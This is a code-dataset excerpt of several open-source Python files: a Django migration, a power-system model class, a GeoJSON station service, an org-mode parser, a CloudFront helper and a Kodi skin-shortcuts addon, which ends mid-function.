repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Pandaaaa906/ChemErpSystem | Inquiry_manage/migrations/0002_auto_20170102_0936.py | 1 | 2813 | # -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-01-02 01:36
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('Product_manage', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('Inquiry_manage', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='quotation',
name='product',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='quotation', to='Product_manage.Product'),
),
migrations.AddField(
model_name='inquiry_item',
name='created_by',
field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inquiry_manage_inquiry_item_created', to=settings.AUTH_USER_MODEL, verbose_name='\u521b\u5efa\u4eba'),
),
migrations.AddField(
model_name='inquiry_item',
name='handler',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='handle_inquiries', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='inquiry_item',
name='inquiry',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Inquiry_manage.Inquiry'),
),
migrations.AddField(
model_name='inquiry_item',
name='modified_by',
field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inquiry_manage_inquiry_item_modified', to=settings.AUTH_USER_MODEL, verbose_name='\u4fee\u6539\u4eba'),
),
migrations.AddField(
model_name='inquiry',
name='created_by',
field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inquiry_manage_inquiry_created', to=settings.AUTH_USER_MODEL, verbose_name='\u521b\u5efa\u4eba'),
),
migrations.AddField(
model_name='inquiry',
name='modified_by',
field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inquiry_manage_inquiry_modified', to=settings.AUTH_USER_MODEL, verbose_name='\u4fee\u6539\u4eba'),
),
migrations.AddField(
model_name='inquiry',
name='sales',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='inquiries', to=settings.AUTH_USER_MODEL),
),
]
| apache-2.0 | 3,179,247,869,178,049,000 | 45.114754 | 235 | 0.644863 | false | 3.639069 | false | false | false |
rwl/PyCIM | CIM14/ENTSOE/Dynamics/IEC61970/Dynamics/ExcitationSystems/ExcitationSystemsExcST4B.py | 1 | 3178 | # Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.ENTSOE.Dynamics.IEC61970.Core.CorePowerSystemResource import CorePowerSystemResource
class ExcitationSystemsExcST4B(CorePowerSystemResource):
def __init__(self, kp=0.0, xl=0.0, vbmax=0.0, ki=0.0, kir=0.0, vrmin=0.0, vmmin=0.0, kim=0.0, ta=0.0, kg=0.0, tr=0.0, kc=0.0, vrmax=0.0, angp=0.0, kpr=0.0, vgmax=0.0, kpm=0.0, vmmax=0.0, *args, **kw_args):
"""Initialises a new 'ExcitationSystemsExcST4B' instance.
@param kp:
@param xl:
@param vbmax:
@param ki:
@param kir:
@param vrmin:
@param vmmin:
@param kim:
@param ta:
@param kg:
@param tr:
@param kc:
@param vrmax:
@param angp:
@param kpr:
@param vgmax:
@param kpm:
@param vmmax:
"""
self.kp = kp
self.xl = xl
self.vbmax = vbmax
self.ki = ki
self.kir = kir
self.vrmin = vrmin
self.vmmin = vmmin
self.kim = kim
self.ta = ta
self.kg = kg
self.tr = tr
self.kc = kc
self.vrmax = vrmax
self.angp = angp
self.kpr = kpr
self.vgmax = vgmax
self.kpm = kpm
self.vmmax = vmmax
super(ExcitationSystemsExcST4B, self).__init__(*args, **kw_args)
_attrs = ["kp", "xl", "vbmax", "ki", "kir", "vrmin", "vmmin", "kim", "ta", "kg", "tr", "kc", "vrmax", "angp", "kpr", "vgmax", "kpm", "vmmax"]
_attr_types = {"kp": float, "xl": float, "vbmax": float, "ki": float, "kir": float, "vrmin": float, "vmmin": float, "kim": float, "ta": float, "kg": float, "tr": float, "kc": float, "vrmax": float, "angp": float, "kpr": float, "vgmax": float, "kpm": float, "vmmax": float}
_defaults = {"kp": 0.0, "xl": 0.0, "vbmax": 0.0, "ki": 0.0, "kir": 0.0, "vrmin": 0.0, "vmmin": 0.0, "kim": 0.0, "ta": 0.0, "kg": 0.0, "tr": 0.0, "kc": 0.0, "vrmax": 0.0, "angp": 0.0, "kpr": 0.0, "vgmax": 0.0, "kpm": 0.0, "vmmax": 0.0}
_enums = {}
_refs = []
_many_refs = []
| mit | 4,906,574,204,467,682,000 | 28.155963 | 276 | 0.596287 | false | 3.018044 | false | false | false |
akrherz/iem | htdocs/geojson/network.py | 1 | 3007 | """GeoJSON of a given IEM network code"""
import json
import datetime
import psycopg2.extras
import memcache
from paste.request import parse_formvars
from pyiem.util import get_dbconn, html_escape
def run(network, only_online):
"""Generate a GeoJSON dump of the provided network"""
pgconn = get_dbconn("mesosite")
cursor = pgconn.cursor(cursor_factory=psycopg2.extras.DictCursor)
# One off special
if network == "ASOS1MIN":
cursor.execute(
"SELECT ST_asGeoJson(geom, 4) as geojson, t.* "
"from stations t JOIN station_attributes a "
"ON (t.iemid = a.iemid) WHERE t.network ~* 'ASOS' and "
"a.attr = 'HAS1MIN' ORDER by id ASC",
)
else:
online = "and online" if only_online else ""
cursor.execute(
"SELECT ST_asGeoJson(geom, 4) as geojson, * from stations "
f"WHERE network = %s {online} ORDER by name ASC",
(network,),
)
res = {
"type": "FeatureCollection",
"features": [],
"generation_time": datetime.datetime.utcnow().strftime(
"%Y-%m-%dT%H:%M:%SZ"
),
"count": cursor.rowcount,
}
for row in cursor:
ab = row["archive_begin"]
ae = row["archive_end"]
time_domain = "(%s-%s)" % (
"????" if ab is None else ab.year,
"Now" if ae is None else ae.year,
)
res["features"].append(
dict(
type="Feature",
id=row["id"],
properties=dict(
elevation=row["elevation"],
sname=row["name"],
time_domain=time_domain,
state=row["state"],
country=row["country"],
climate_site=row["climate_site"],
wfo=row["wfo"],
tzname=row["tzname"],
ncdc81=row["ncdc81"],
ncei91=row["ncei91"],
ugc_county=row["ugc_county"],
ugc_zone=row["ugc_zone"],
county=row["county"],
sid=row["id"],
),
geometry=json.loads(row["geojson"]),
)
)
return json.dumps(res)
def application(environ, start_response):
"""Main Workflow"""
headers = [("Content-type", "application/vnd.geo+json")]
form = parse_formvars(environ)
cb = form.get("callback", None)
network = form.get("network", "KCCI")
only_online = form.get("only_online", "0") == "1"
mckey = "/geojson/network/%s.geojson|%s" % (network, only_online)
mc = memcache.Client(["iem-memcached:11211"], debug=0)
res = mc.get(mckey)
if not res:
res = run(network, only_online)
mc.set(mckey, res, 3600)
if cb is None:
data = res
else:
data = "%s(%s)" % (html_escape(cb), res)
start_response("200 OK", headers)
return [data.encode("ascii")]
| mit | 5,936,087,925,441,181,000 | 30.322917 | 71 | 0.513136 | false | 3.754057 | false | false | false |
rdmnk/Orgnode | Orgnode/myorgnode.py | 1 | 17535 | # MIT License
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copycopy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Program written by Charles Cave ([email protected])
# February - March 2009
# Version 2 - June 2009
# Added support for all tags, TODO priority and checking existence of a tag
# More information at
# http://members.optusnet.com.au/~charles57/GTD
# Jule 2017, by Roman.Dmnk
# Added 'maketree' function.
"""
The Orgnode module consists of the Orgnode class for representing a
headline and associated text from an org-mode file, and routines for
constructing data structures of these classes.
"""
import re, sys, os.path
import datetime
import json
def toJSON(nodelist):
return json.dumps(nodelist, default=lambda o:
o.isoformat() if isinstance (o, datetime.date) else o.__dict__,
sort_keys=True, indent=4)
def maketree(filename, filecontent):
"""
Read an org-mode file and return a tree of Orgnode objects
created from this file.
"""
ctr = 0
#try:
# f = open(filename, 'r')
#except IOError:
# print "Unable to open file [%s] " % filename
# print "Program terminating."
# sys.exit(1)
todos = dict() # populated from #+SEQ_TODO line
todos['TODO'] = '' # default values
todos['DONE'] = '' # default values
level = 0
heading = ""
bodytext = ""
tag1 = "" # The first tag enclosed in ::
alltags = [] # list of all tags in headline
sched_date = ''
deadline_date = ''
nodetree = []
propdict = dict()
parent = None
lsib = None
parent_list = [0,] # consists of (parent node_ctr)
node_ctr = 1
filebase = os.path.splitext(os.path.basename(filename))[0]
thisNode = Orgnode('', filebase, "", "", "", None, None)
nodetree.append(thisNode)
lines = filecontent.split('\n')
for line in lines:
ctr += 1
hdng = re.search('^(\*+)\s(.*?)\s*$', line)
if hdng:
if heading: # we are processing a heading line
thisNode = Orgnode(level, heading, bodytext, tag1, alltags, parent, lsib)
if sched_date:
thisNode.setScheduled(sched_date)
sched_date = ""
if deadline_date:
thisNode.setDeadline(deadline_date)
deadline_date = ''
thisNode.setProperties(propdict)
nodetree.append( thisNode )
propdict = dict()
level = hdng.group(1)
try:
lsib = parent_list[len(level)]
nodetree[parent_list[len(level)]].rsib = node_ctr
except IndexError:
lsib = None
pass
parent_list = parent_list[:len(level)]
parent_list.append(node_ctr)
if len(parent_list) > 1:
parent = parent_list[-2]
nodetree[parent_list[-2]].childs.append(node_ctr)
else:
parent = None
heading = hdng.group(2)
bodytext = ""
tag1 = ""
alltags = [] # list of all tags in headline
tagsrch = re.search('(.*?)\s*:(.*?):(.*?)$',heading)
if tagsrch:
heading = tagsrch.group(1)
tag1 = tagsrch.group(2)
alltags.append(tag1)
tag2 = tagsrch.group(3)
if tag2:
for t in tag2.split(':'):
if t != '': alltags.append(t)
node_ctr = node_ctr + 1;
else: # we are processing a non-heading line
if line[:10] == '#+SEQ_TODO':
kwlist = re.findall('([A-Z]+)\(', line)
for kw in kwlist: todos[kw] = ""
if line[:1] != '#':
bodytext = bodytext + line
if re.search(':PROPERTIES:', line): continue
if re.search(':END:', line): continue
prop_srch = re.search('^\s*:(.*?):\s*(.*?)\s*$', line)
if prop_srch:
propdict[prop_srch.group(1)] = prop_srch.group(2)
continue
sd_re = re.search('SCHEDULED:\s+<([0-9]+)\-([0-9]+)\-([0-9]+)', line)
if sd_re:
sched_date = datetime.date(int(sd_re.group(1)),
int(sd_re.group(2)),
int(sd_re.group(3)) )
dd_re = re.search('DEADLINE:\s*<(\d+)\-(\d+)\-(\d+)', line)
if dd_re:
deadline_date = datetime.date(int(dd_re.group(1)),
int(dd_re.group(2)),
int(dd_re.group(3)) )
# write out last node
thisNode = Orgnode(level, heading, bodytext, tag1, alltags, parent, lsib)
thisNode.setProperties(propdict)
if sched_date:
thisNode.setScheduled(sched_date)
if deadline_date:
thisNode.setDeadline(deadline_date)
nodetree.append( thisNode )
# using the list of TODO keywords found in the file
# process the headings searching for TODO keywords
for n in nodetree:
h = n.Heading()
todoSrch = re.search('([A-Z]+)\s(.*?)$', h)
if todoSrch:
if todos.has_key( todoSrch.group(1) ):
n.setHeading( todoSrch.group(2) )
n.setTodo ( todoSrch.group(1) )
prtysrch = re.search('^\[\#(A|B|C)\] (.*?)$', n.Heading())
if prtysrch:
n.setPriority(prtysrch.group(1))
n.setHeading(prtysrch.group(2))
return nodetree
def makelist(filename):
"""
Read an org-mode file and return a list of Orgnode objects
created from this file.
"""
ctr = 0
try:
f = open(filename, 'r')
except IOError:
print "Unable to open file [%s] " % filename
print "Program terminating."
sys.exit(1)
todos = dict() # populated from #+SEQ_TODO line
todos['TODO'] = '' # default values
todos['DONE'] = '' # default values
level = 0
heading = ""
bodytext = ""
tag1 = "" # The first tag enclosed in ::
alltags = [] # list of all tags in headline
sched_date = ''
deadline_date = ''
nodelist = []
propdict = dict()
for line in f:
ctr += 1
hdng = re.search('^(\*+)\s(.*?)\s*$', line)
if hdng:
if heading: # we are processing a heading line
thisNode = Orgnode(level, heading, bodytext, tag1, alltags)
if sched_date:
thisNode.setScheduled(sched_date)
sched_date = ""
if deadline_date:
thisNode.setDeadline(deadline_date)
deadline_date = ''
thisNode.setProperties(propdict)
nodelist.append( thisNode )
propdict = dict()
level = hdng.group(1)
heading = hdng.group(2)
bodytext = ""
tag1 = ""
alltags = [] # list of all tags in headline
tagsrch = re.search('(.*?)\s*:(.*?):(.*?)$',heading)
if tagsrch:
heading = tagsrch.group(1)
tag1 = tagsrch.group(2)
alltags.append(tag1)
tag2 = tagsrch.group(3)
if tag2:
for t in tag2.split(':'):
if t != '': alltags.append(t)
else: # we are processing a non-heading line
if line[:10] == '#+SEQ_TODO':
kwlist = re.findall('([A-Z]+)\(', line)
for kw in kwlist: todos[kw] = ""
if line[:1] != '#':
bodytext = bodytext + line
if re.search(':PROPERTIES:', line): continue
if re.search(':END:', line): continue
prop_srch = re.search('^\s*:(.*?):\s*(.*?)\s*$', line)
if prop_srch:
propdict[prop_srch.group(1)] = prop_srch.group(2)
continue
sd_re = re.search('SCHEDULED:\s+<([0-9]+)\-([0-9]+)\-([0-9]+)', line)
if sd_re:
sched_date = datetime.date(int(sd_re.group(1)),
int(sd_re.group(2)),
int(sd_re.group(3)) )
dd_re = re.search('DEADLINE:\s*<(\d+)\-(\d+)\-(\d+)', line)
if dd_re:
deadline_date = datetime.date(int(dd_re.group(1)),
int(dd_re.group(2)),
int(dd_re.group(3)) )
# write out last node
thisNode = Orgnode(level, heading, bodytext, tag1, alltags)
thisNode.setProperties(propdict)
if sched_date:
thisNode.setScheduled(sched_date)
if deadline_date:
thisNode.setDeadline(deadline_date)
nodelist.append( thisNode )
# using the list of TODO keywords found in the file
# process the headings searching for TODO keywords
for n in nodelist:
h = n.Heading()
todoSrch = re.search('([A-Z]+)\s(.*?)$', h)
if todoSrch:
if todos.has_key( todoSrch.group(1) ):
n.setHeading( todoSrch.group(2) )
n.setTodo ( todoSrch.group(1) )
prtysrch = re.search('^\[\#(A|B|C)\] (.*?)$', n.Heading())
if prtysrch:
n.setPriority(prtysrch.group(1))
n.setHeading(prtysrch.group(2))
return nodelist
######################
class Orgnode(object):
"""
Orgnode class represents a headline, tags and text associated
with the headline.
"""
def __init__(self, level, headline, body, tag, alltags, parent=None, lsib=None):
"""
Create an Orgnode object given the parameters of level (as the
raw asterisks), headline text (including the TODO tag), and
first tag. The makelist routine postprocesses the list to
identify TODO tags and updates headline and todo fields.
"""
self.level = len(level)
self.headline = headline
self.body = body
self.tag = tag # The first tag in the list
self.tags = dict() # All tags in the headline
self.todo = ""
self.prty = "" # empty of A, B or C
self.scheduled = "" # Scheduled date
self.deadline = "" # Deadline date
self.properties = dict()
for t in alltags:
self.tags[t] = ''
self.childs = []
self.parent = parent
self.lsib = lsib
self.rsib = None
# Look for priority in headline and transfer to prty field
def Heading(self):
"""
Return the Heading text of the node without the TODO tag
"""
return self.headline
def setHeading(self, newhdng):
"""
Change the heading to the supplied string
"""
self.headline = newhdng
def Body(self):
"""
Returns all lines of text of the body of this node except the
Property Drawer
"""
return self.body
def Level(self):
"""
Returns an integer corresponding to the level of the node.
Top level (one asterisk) has a level of 1.
"""
return self.level
def Priority(self):
"""
Returns the priority of this headline: 'A', 'B', 'C' or empty
string if priority has not been set.
"""
return self.prty
def setPriority(self, newprty):
"""
Change the value of the priority of this headline.
Values values are '', 'A', 'B', 'C'
"""
self.prty = newprty
def Tag(self):
"""
Returns the value of the first tag.
For example, :HOME:COMPUTER: would return HOME
"""
return self.tag
def Tags(self):
"""
Returns a list of all tags
For example, :HOME:COMPUTER: would return ['HOME', 'COMPUTER']
"""
return self.tags.keys()
def hasTag(self, srch):
"""
Returns True if the supplied tag is present in this headline
For example, hasTag('COMPUTER') on headling containing
:HOME:COMPUTER: would return True.
"""
return self.tags.has_key(srch)
def setTag(self, newtag):
"""
Change the value of the first tag to the supplied string
"""
self.tag = newtag
def setTags(self, taglist):
"""
Store all the tags found in the headline. The first tag will
also be stored as if the setTag method was called.
"""
for t in taglist:
self.tags[t] = ''
def Todo(self):
"""
Return the value of the TODO tag
"""
return self.todo
def setTodo(self, value):
"""
Set the value of the TODO tag to the supplied string
"""
self.todo = value
def setProperties(self, dictval):
"""
Sets all properties using the supplied dictionary of
name/value pairs
"""
self.properties = dictval
def Property(self, keyval):
"""
Returns the value of the requested property or null if the
property does not exist.
"""
return self.properties.get(keyval, "")
def setScheduled(self, dateval):
"""
Set the scheduled date using the supplied date object
"""
self.scheduled = dateval
def Scheduled(self):
"""
Return the scheduled date object or null if nonexistent
"""
return self.scheduled
def setDeadline(self, dateval):
"""
Set the deadline (due) date using the supplied date object
"""
self.deadline = dateval
def Deadline(self):
"""
Return the deadline date object or null if nonexistent
"""
return self.deadline
def __repr__(self): #
"""
Print the level, heading text and tag of a node and the body
text as used to construct the node.
"""
# This method is not completed yet.
n = ''
for i in range(0, self.level):
n = n + '*'
n = n + ' ' + self.todo + ' '
if self.prty:
n = n + '[#' + self.prty + '] '
n = n + self.headline
n = "%-60s " % n # hack - tags will start in column 62
closecolon = ''
for t in self.tags.keys():
n = n + ':' + t
closecolon = ':'
n = n + closecolon
# Need to output Scheduled Date, Deadline Date, property tags The
# following will output the text used to construct the object
n = n + "\n" + self.body
return n
def jointrees (name, args):
parent_list = [0, ]
nodetree = list()
node_ctr = 1
thisNode = Orgnode('', name, "", "", "", None, None)
nodetree.append(thisNode)
for nt in args:
# for item #0
nt[0].level = nt[0].level + 1
try:
nt[0].lsib = parent_list[nt[0].level]
nodetree[parent_list[nt[0].level]].rsib = node_ctr
except IndexError:
lsib = None
pass
parent_list = parent_list[:nt[0].level]
parent_list.append(node_ctr)
if len(parent_list) > 1:
nt[0].parent = parent_list[-2]
nodetree[parent_list[-2]].childs.append(node_ctr)
else:
parent = None
nodetree.append(nt[0])
# for other items
for item in nt[1:]:
item.level = item.level + 1
if item.parent:
item.parent = node_ctr + item.parent
if item.lsib:
item.slib = node_ctr + item.lsib
if item.rsib:
item.rsib = node_ctr + item.rsib
nodetree.append(item)
node_ctr = node_ctr + len(nt);
return nodetree
| mit | 7,033,371,234,430,106,000 | 31.210227 | 86 | 0.509552 | false | 3.951995 | false | false | false |
fusic-com/flask-todo | config/cdn.py | 2 | 1143 | import json
from urlobject import URLObject
from boto import connect_cloudfront
from . import settings
from . import paths
CACHE_FILE=paths.CACHE/'cdn.json'
def get_cache(force_rebuild=False):
if not settings.AWS_ACCESS_KEY_ID:
return {}
if force_rebuild or not hasattr(get_cache, 'cache'):
if force_rebuild or not CACHE_FILE.exists():
CACHE_FILE.dirname().makedirs_p()
connection = connect_cloudfront(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_ACCESS_KEY)
distributions = connection.get_all_distributions()
cache = {distribution.origin.dns_name: distribution.domain_name for distribution in distributions}
with open(CACHE_FILE, 'w') as handle:
json.dump(cache, handle)
else:
with open(CACHE_FILE) as handle:
cache = json.load(handle)
get_cache.cache = cache
return get_cache.cache
def proxied(url):
url = URLObject(url)
netloc = url.netloc or settings.SERVER_NAME
cache = get_cache()
if netloc not in cache:
return url
return url.with_netloc(cache[netloc])
| mit | 3,600,982,094,379,134,000 | 33.636364 | 110 | 0.655293 | false | 3.901024 | false | false | false |
AMOboxTV/AMOBox.LegoBuild | script.skinshortcuts/resources/lib/xmlfunctions.py | 1 | 51495 | # coding=utf-8
import os, sys, datetime, unicodedata, re
import xbmc, xbmcgui, xbmcvfs, xbmcaddon
import xml.etree.ElementTree as xmltree
from xml.sax.saxutils import escape as escapeXML
import ast
from traceback import print_exc
from unicodeutils import try_decode
if sys.version_info < (2, 7):
import simplejson
else:
import json as simplejson
__addon__ = xbmcaddon.Addon()
__addonid__ = sys.modules[ "__main__" ].__addonid__
__addonversion__ = __addon__.getAddonInfo('version')
__xbmcversion__ = xbmc.getInfoLabel( "System.BuildVersion" ).split(".")[0]
__datapath__ = os.path.join( xbmc.translatePath( "special://profile/addon_data/" ).decode('utf-8'), __addonid__ ).encode('utf-8')
__masterpath__ = os.path.join( xbmc.translatePath( "special://masterprofile/addon_data/" ).decode('utf-8'), __addonid__ ).encode('utf-8')
__skin__ = xbmc.translatePath( "special://skin/" )
__language__ = __addon__.getLocalizedString
import datafunctions, template
DATA = datafunctions.DataFunctions()
import hashlib, hashlist
def log(txt):
if __addon__.getSetting( "enable_logging" ) == "true":
if isinstance (txt,str):
txt = txt.decode('utf-8')
message = u'%s: %s' % (__addonid__, txt)
xbmc.log(msg=message.encode('utf-8'), level=xbmc.LOGDEBUG)
class XMLFunctions():
def __init__(self):
self.MAINWIDGET = {}
self.MAINBACKGROUND = {}
self.MAINPROPERTIES = {}
self.hasSettings = False
self.widgetCount = 1
self.loadedPropertyPatterns = False
self.propertyPatterns = None
self.skinDir = xbmc.translatePath( "special://skin" )
self.checkForShorctcuts = []
def buildMenu( self, mainmenuID, groups, numLevels, buildMode, options, minitems, weEnabledSystemDebug = False, weEnabledScriptDebug = False ):
# Entry point for building includes.xml files
if xbmcgui.Window( 10000 ).getProperty( "skinshortcuts-isrunning" ) == "True":
return
xbmcgui.Window( 10000 ).setProperty( "skinshortcuts-isrunning", "True" )
# Get a list of profiles
fav_file = xbmc.translatePath( 'special://userdata/profiles.xml' ).decode("utf-8")
tree = None
if xbmcvfs.exists( fav_file ):
f = xbmcvfs.File( fav_file )
tree = xmltree.fromstring( f.read() )
profilelist = []
if tree is not None:
profiles = tree.findall( "profile" )
for profile in profiles:
name = profile.find( "name" ).text.encode( "utf-8" )
dir = profile.find( "directory" ).text.encode( "utf-8" )
log( "Profile found: " + name + " (" + dir + ")" )
# Localise the directory
if "://" in dir:
dir = xbmc.translatePath( dir ).decode( "utf-8" )
else:
# Base if off of the master profile
dir = xbmc.translatePath( os.path.join( "special://masterprofile", dir ) ).decode( "utf-8" )
profilelist.append( [ dir, "StringCompare(System.ProfileName," + name.decode( "utf-8" ) + ")", name.decode( "utf-8" ) ] )
else:
profilelist = [["special://masterprofile", None]]
if self.shouldwerun( profilelist ) == False:
log( "Menu is up to date" )
xbmcgui.Window( 10000 ).clearProperty( "skinshortcuts-isrunning" )
return
progress = None
# Create a progress dialog
progress = xbmcgui.DialogProgressBG()
progress.create(__addon__.getAddonInfo( "name" ), __language__( 32049 ) )
progress.update( 0 )
# Write the menus
try:
self.writexml( profilelist, mainmenuID, groups, numLevels, buildMode, progress, options, minitems )
complete = True
except:
log( "Failed to write menu" )
print_exc()
complete = False
# Mark that we're no longer running, clear the progress dialog
xbmcgui.Window( 10000 ).clearProperty( "skinshortcuts-isrunning" )
progress.close()
if complete == True:
# Menu is built, reload the skin
xbmc.executebuiltin( "XBMC.ReloadSkin()" )
else:
# Menu couldn't be built - generate a debug log
# If we enabled debug logging
if weEnabledSystemDebug or weEnabledScriptDebug:
# Disable any logging we enabled
if weEnabledSystemDebug:
json_query = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 0, "method":"Settings.setSettingValue", "params": {"setting":"debug.showloginfo", "value":false} } ' )
if weEnabledScriptDebug:
__addon__.setSetting( "enable_logging", "false" )
# Offer to upload a debug log
if xbmc.getCondVisibility( "System.HasAddon( script.xbmc.debug.log )" ):
ret = xbmcgui.Dialog().yesno( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32093 ) )
if ret:
xbmc.executebuiltin( "RunScript(script.xbmc.debug.log)" )
else:
xbmcgui.Dialog().ok( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32094 ) )
else:
# Enable any debug logging needed
json_query = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 0, "method": "Settings.getSettings" }')
json_query = unicode(json_query, 'utf-8', errors='ignore')
json_response = simplejson.loads(json_query)
enabledSystemDebug = False
enabledScriptDebug = False
if json_response.has_key('result') and json_response['result'].has_key('settings') and json_response['result']['settings'] is not None:
for item in json_response['result']['settings']:
if item["id"] == "debug.showloginfo":
if item["value"] == False:
json_query = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 0, "method":"Settings.setSettingValue", "params": {"setting":"debug.showloginfo", "value":true} } ' )
enabledSystemDebug = True
if __addon__.getSetting( "enable_logging" ) != "true":
__addon__.setSetting( "enable_logging", "true" )
enabledScriptDebug = True
if enabledSystemDebug or enabledScriptDebug:
# We enabled one or more of the debug options, re-run this function
self.buildMenu( mainmenuID, groups, numLevels, buildMode, options, minitems, enabledSystemDebug, enabledScriptDebug )
else:
# Offer to upload a debug log
if xbmc.getCondVisibility( "System.HasAddon( script.xbmc.debug.log )" ):
ret = xbmcgui.Dialog().yesno( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32093 ) )
if ret:
xbmc.executebuiltin( "RunScript(script.xbmc.debug.log)" )
else:
xbmcgui.Dialog().ok( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32094 ) )
def shouldwerun( self, profilelist ):
try:
property = xbmcgui.Window( 10000 ).getProperty( "skinshortcuts-reloadmainmenu" )
xbmcgui.Window( 10000 ).clearProperty( "skinshortcuts-reloadmainmenu" )
if property == "True":
log( "Menu has been edited")
return True
except:
pass
# Save some settings to skin strings
xbmc.executebuiltin( "Skin.SetString(skinshortcuts-sharedmenu,%s)" %( __addon__.getSetting( "shared_menu" ) ) )
# Get the skins addon.xml file
addonpath = xbmc.translatePath( os.path.join( "special://skin/", 'addon.xml').encode("utf-8") ).decode("utf-8")
addon = xmltree.parse( addonpath )
extensionpoints = addon.findall( "extension" )
paths = []
skinpaths = []
# Get the skin version
skinVersion = addon.getroot().attrib.get( "version" )
# Get the directories for resolutions this skin supports
for extensionpoint in extensionpoints:
if extensionpoint.attrib.get( "point" ) == "xbmc.gui.skin":
resolutions = extensionpoint.findall( "res" )
for resolution in resolutions:
path = xbmc.translatePath( os.path.join( "special://skin/", resolution.attrib.get( "folder" ), "script-skinshortcuts-includes.xml").encode("utf-8") ).decode("utf-8")
paths.append( path )
skinpaths.append( path )
# Check for the includes file
for path in paths:
if not xbmcvfs.exists( path ):
log( "Includes file does not exist" )
return True
else:
pass
try:
hashes = ast.literal_eval( xbmcvfs.File( os.path.join( __masterpath__ , xbmc.getSkinDir() + ".hash" ) ).read() )
except:
# There is no hash list, return True
log( "No hash list" )
print_exc()
return True
checkedXBMCVer = False
checkedSkinVer = False
checkedScriptVer = False
checkedProfileList = False
checkedPVRVis = False
checkedSharedMenu = False
foundFullMenu = False
for hash in hashes:
if hash[1] is not None:
if hash[0] == "::XBMCVER::":
# Check the skin version is still the same as hash[1]
checkedXBMCVer = True
if __xbmcversion__ != hash[1]:
log( "Now running a different version of Kodi" )
return True
elif hash[0] == "::SKINVER::":
# Check the skin version is still the same as hash[1]
checkedSkinVer = True
if skinVersion != hash[1]:
log( "Now running a different skin version" )
return True
elif hash[0] == "::SCRIPTVER::":
# Check the script version is still the same as hash[1]
checkedScriptVer = True
if __addonversion__ != hash[1]:
log( "Now running a different script version" )
return True
elif hash[0] == "::PROFILELIST::":
# Check the profilelist is still the same as hash[1]
checkedProfileList = True
if profilelist != hash[1]:
log( "Profiles have changes" )
return True
elif hash[0] == "::HIDEPVR::":
checkedPVRVis = True
if __addon__.getSetting( "donthidepvr" ) != hash[1]:
log( "PVR visibility setting has changed" )
elif hash[0] == "::SHARED::":
# Check whether shared-menu setting has changed
checkedSharedMenu = True
if __addon__.getSetting( "shared_menu" ) != hash[1]:
log( "Shared menu setting has changed" )
return True
elif hash[0] == "::LANGUAGE::":
# We no longer need to rebuild on a system language change
pass
elif hash[0] == "::SKINBOOL::":
# A boolean we need to set (if profile matches)
